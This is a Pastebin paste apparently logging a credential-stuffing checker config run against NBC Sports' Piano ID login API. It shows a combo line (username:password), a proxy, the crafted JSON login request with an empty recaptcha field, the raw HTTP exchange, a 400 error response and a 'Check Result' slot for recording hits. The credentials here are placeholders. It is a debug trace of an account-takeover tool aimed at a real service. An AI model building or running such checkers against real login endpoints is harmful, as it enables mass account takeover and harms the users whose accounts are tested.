Advertisement
Guest User

Untitled

a guest
Dec 19th, 2018
177
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.55 KB | None | 0 0
  1.  
  2. ============
  3. Username: aaaaaaaa@a.com
  4. Password: 111111111111
  5. Combo: aaaaaaaa@a.com:111111111111
  6. Proxy: 1.2.169.84:59244
  7. Proxy Type: Http
  8. ============
  9.  
  10. --------------
  11.  
  12. Declaring 'Link1' variable with 'https://pmauth.nbcsports.com/id/api/v1/identity/login/token?aid=Je5wPuCjpI' value
  13.  
  14. --------------
  15.  
  16. Declaring 'Head1' variable with 'Host: pmauth.nbcsports.com
  17. Connection: keep-alive
  18. Accept: application/json, text/plain, */*
  19. Origin: https://pmauth.nbcsports.com
  20. User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/76.0.114 Chrome/70.0.3538.114 Safari/537.36
  21. content-type: application/json
  22. Referer: https://pmauth.nbcsports.com/id/?client_id=Je5wPuCjpI&sender=piano-id-zKtjm&origin=https%3A%2F%2Fwww.nbcsports.com&site=https%3A%2F%2Fwww.nbcsports.com&screen=login&width=400
  23. Accept-Language: vi-VN,vi;q=0.9,fr-FR;q=0.8,fr;q=0.7,en-US;q=0.6,en;q=0.5
  24. Accept-Encoding: gzip, deflate' value
  25.  
  26. --------------
  27.  
  28. Executing and Assigning 'CombineText("{
  29. chr(double quotes)loginchr(double quotes): chr(double quotes)",$ComboUsername#,"(double quotes)chr(Comma)
  30. chr(double quotes)passwordchr(double quotes): chr(double quotes)",$ComboPassword#,"chr(double quotes)chr(Comma)
  31. chr(double quotes)recaptchaResponsechr(double quotes): chr(double quotes)chr(double quotes)
  32. }")' codes to 'Post' variable.
  33.  
  34. Execution result: {
  35. "login": "aaaaaaaa@a.com(double quotes),
  36. "password": "111111111111",
  37. "recaptchaResponse": ""
  38. }
  39.  
  40. --------------
  41. ============ Stage 1 - Sent Data ============
  42. POST /id/api/v1/identity/login/token?aid=Je5wPuCjpI HTTP/1.1
  43. Host: pmauth.nbcsports.com
  44. Connection: keep-alive
  45. Accept: application/json, text/plain, */*
  46. Origin: https://pmauth.nbcsports.com
  47. User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/76.0.114 Chrome/70.0.3538.114 Safari/537.36
  48. content-type: application/json
  49. Referer: https://pmauth.nbcsports.com/id/?client_id=Je5wPuCjpI&sender=piano-id-zKtjm&origin=https%3A%2F%2Fwww.nbcsports.com&site=https%3A%2F%2Fwww.nbcsports.com&screen=login&width=400
  50. Accept-Language: vi-VN,vi;q=0.9,fr-FR;q=0.8,fr;q=0.7,en-US;q=0.6,en;q=0.5
  51. Accept-Encoding: gzip, deflate
  52. Content-Length: 106
  53.  
  54. {
  55. "login": "aaaaaaaa@a.com(double quotes),
  56. "password": "111111111111",
  57. "recaptchaResponse": ""
  58. }
  59.  
  60. ============ Stage 1 - Received Data ============
  61. HTTP/1.1 400
  62. Access-Control-Allow-Credentials: true
  63. Access-Control-Allow-Headers: origin, content-type, accept, authorization
  64. Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS, HEAD
  65. Access-Control-Allow-Origin: *
  66. Cache-Control: no-cache, no-store, must-revalidate
  67. Content-Type: text/plain
  68. Date: Wed, 19 Dec 2018 13:02:23 GMT
  69. Expires: Thu, 01 Jan 1970 00:00:00 GMT
  70. P3P: CP="ALL ADM DEV PSAi COM OUR OTRo STP IND ONL", CP="NON DSP COR OUR IND"
  71. Pragma: no-cache
  72. Server: TPI
  73. Set-Cookie: JSESSIONID=A71F89087FB52CABE8541E2DB6B5389A; Domain=tinypass.com; Path=/; HttpOnly
  74. wn: []
  75. Connection: keep-alive
  76. Content-Length: 434
  77.  
  78.  
  79.  
  80. =====Start Received Source=====
  81. Illegal unquoted character ((CTRL-CHAR, code 13)): has to be escaped using backslash to be included in string value
  82. at [Source: (org.glassfish.jersey.message.internal.ReaderInterceptorExecutor$UnCloseableInputStream); line: 2, column: 44]
  83. at [Source: (org.glassfish.jersey.message.internal.ReaderInterceptorExecutor$UnCloseableInputStream); line: 2, column: 12] (through reference chain: io.piano.id.api.model.LoginRequest["login"])
  84. =====End Received Source=====
  85.  
  86. ============
  87. Check Result: Unknown
  88. Save Format:
  89. ============
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement